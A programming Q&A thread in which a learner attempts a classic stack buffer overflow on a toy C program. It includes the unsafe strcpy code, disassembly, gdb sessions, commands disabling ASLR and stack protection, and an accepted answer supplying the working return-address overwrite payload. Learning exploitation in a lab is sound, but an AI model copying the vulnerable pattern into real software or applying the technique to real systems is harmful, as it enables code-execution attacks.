# trying to buffer overflow simple c program

Tags: buffer-overflow

i'm having problem to buffer overflow a simple c program that takes input from command line, this is the main.c code:

```
#include <stdio.h>
#include <string.h>
void func(char *name)
{
   char buf[10];
   strcpy(buf, name);
}
void chgflow(){
     printf("changed flow!!\n");
}
void main(int argc, char *argv[])
{
  func(argv[1]);
  printf("i should not be viewed if flow is changed\n");
  chgflow();
}
```

this is the assembly version taken from objdump -d ./main :

```
<main>:
 5a3:   8d 4c 24 04             lea    0x4(%esp),%ecx
 5a7:   83 e4 f0                and    $0xfffffff0,%esp
 5aa:   ff 71 fc                pushl  -0x4(%ecx)
 5ad:   55                      push   %ebp
 5ae:   89 e5                   mov    %esp,%ebp
 5b0:   53                      push   %ebx
 5b1:   51                      push   %ecx
 5b2:   e8 99 fe ff ff          call   450 <__x86.get_pc_thunk.bx>
 5b7:   81 c3 49 1a 00 00       add    $0x1a49,%ebx
 5bd:   89 c8                   mov    %ecx,%eax
 5bf:   8b 40 04                mov    0x4(%eax),%eax
 5c2:   83 c0 04                add    $0x4,%eax
 5c5:   8b 00                   mov    (%eax),%eax
 5c7:   83 ec 0c                sub    $0xc,%esp
 5ca:   50                      push   %eax
 5cb:   e8 7d ff ff ff          call   54d <func>
 5d0:   83 c4 10                add    $0x10,%esp
 5d3:   83 ec 0c                sub    $0xc,%esp
 5d6:   8d 83 90 e6 ff ff       lea    -0x1970(%ebx),%eax
 5dc:   50                      push   %eax
 5dd:   e8 fe fd ff ff          call   3e0 <puts@plt>
 5e2:   83 c4 10                add    $0x10,%esp
 5e5:   e8 8e ff ff ff          call   578 <chgflow>
 5ea:   90                      nop
 5eb:   8d 65 f8                lea    -0x8(%ebp),%esp
 5ee:   59                      pop    %ecx
 5ef:   5b                      pop    %ebx
 5f0:   5d                      pop    %ebp
 5f1:   8d 61 fc                lea    -0x4(%ecx),%esp
 5f4:   c3                      ret

<func>:
 54d:   55                      push   %ebp
 54e:   89 e5                   mov    %esp,%ebp
 550:   53                      push   %ebx
 551:   83 ec 14                sub    $0x14,%esp
 554:   e8 9c 00 00 00          call   5f5 <__x86.get_pc_thunk.ax>
 559:   05 a7 1a 00 00          add    $0x1aa7,%eax
 55e:   83 ec 08                sub    $0x8,%esp
 561:   ff 75 08                pushl  0x8(%ebp)
 564:   8d 55 ee                lea    -0x12(%ebp),%edx
 567:   52                      push   %edx
 568:   89 c3                   mov    %eax,%ebx
 56a:   e8 61 fe ff ff          call   3d0 <strcpy@plt>
 56f:   83 c4 10                add    $0x10,%esp
 572:   90                      nop
 573:   8b 5d fc                mov    -0x4(%ebp),%ebx
 576:   c9                      leave
 577:   c3                      ret

<chgflow>:
 578:   55                      push   %ebp
 579:   89 e5                   mov    %esp,%ebp
 57b:   53                      push   %ebx
 57c:   83 ec 04                sub    $0x4,%esp
 57f:   e8 71 00 00 00          call   5f5 <__x86.get_pc_thunk.ax>
 584:   05 7c 1a 00 00          add    $0x1a7c,%eax
 589:   83 ec 0c                sub    $0xc,%esp
 58c:   8d 90 80 e6 ff ff       lea    -0x1980(%eax),%edx
 592:   52                      push   %edx
 593:   89 c3                   mov    %eax,%ebx
 595:   e8 46 fe ff ff          call   3e0 <puts@plt>
 59a:   83 c4 10                add    $0x10,%esp
 59d:   90                      nop
 59e:   8b 5d fc                mov    -0x4(%ebp),%ebx
 5a1:   c9                      leave
 5a2:   c3                      ret
```

first of all i executed:

```
echo 0 > /proc/sys/kernel/randomize_va_space
```

then compiled main.c :

```
gcc -m32 -g main.c -o main -fno-stack-protector
```

when `func` function terminates i want to overwrite the regular ret address, and pointing to `chgflow` function, therefore bypassing the regular next instruction:

```
printf("i should not be viewed if flow is changed\n");
```

to debug the main.c and inspect which memory addresses are in place i executed:

```
gdb ./main
go
disas main
disas chgflow
```

and this is what i found for disas main:

```
0x565555cb <+40>:    call   0x5655554d <func>
0x565555d0 <+45>:    add    $0x10,%esp
```

and for chgflow:

```
Dump of assembler code for function chgflow:
0x56555578 <+0>:     push   %ebp
```

So i can understand that:

```
0x565555d0 <+45>:    add    $0x10,%esp
```

is the regular ret address (and next instruction) after `func` terminates, and `0x56555578` is the first instruction of `chgflow` function. Now i have to inspect assembly of `func` to understand how many char A (let's say) i need for stuffing the stack; from this line:

```
564:   8d 55 ee                lea    -0x12(%ebp),%edx
```

i understand i need 18Byte + 4 Byte of A stuffing to get to Ret address. To confirm this i executed again:

```
gdb ./main
break 7
run AAAAAAAAAAAAAAAAAAAAAA
```

("A" repeated 22 times)

```
(gdb) x/s $ebp-18
0xffffd2a6: 'A' <repeats 22 times>
(gdb) x/s $ebp
0xffffd2b8: "AAAA"
(gdb) x/x $ebp+4
0xffffd2bc: 0x00
```

my test finished here because i cannot understand why `(gdb) x/x $ebp+4` that should be the Ret address, displays `0x00` as the result. I expected the ret address to not change from the regular one `0x565555d0`. But, hey! `0x00` should be the terminator isn't it? So i went on and performed another test with 21 "A" stuffing and the result is correct this time:

```
(gdb) x/x $ebp+4
0xffffd2bc: 0x565555d0
```

My last need is now to overwrite the return address with 0x56555578, that is the address of the first instruction of `chgflow` function. I performed the previous test with this replaced:

```
run AAAAAAAAAAAAAAAAAAAAA\x78\x55\x55\x56
```

("A" repeats 21 times) but gdb gave to me:

Breakpoint 1, func (name=0x35357835 ) at main.c:7

and this is what i can see from memory:

```
(gdb) x/x $ebp+4
0xffffd2ac: 0x37
(gdb) x/s $ebp+4
0xffffd2ac: "78x55x55x56"
```

finally i was not able to jump to `chgflow`

Anyone can help me with this? 
i'd really appreciate. 
regards Marco

Answer (score 1, accepted):

When you execute `run AAAAAAAAAAAAAAAAAAAAA\x78\x55\x55\x56`, it does not parse for hex escape sequences.  The backslashes are taken similarly to shell escape sequences (e.g., \n) but hex characters are not supported.

In order to get the hex sequences converted to characters, you need to use an external program.  Since you just need a literal sequence converted, the easiest to use is printf:

```
run $(printf "AAAAAAAAAAAAAAAAAAAAA\x78\x55\x55\x56")
```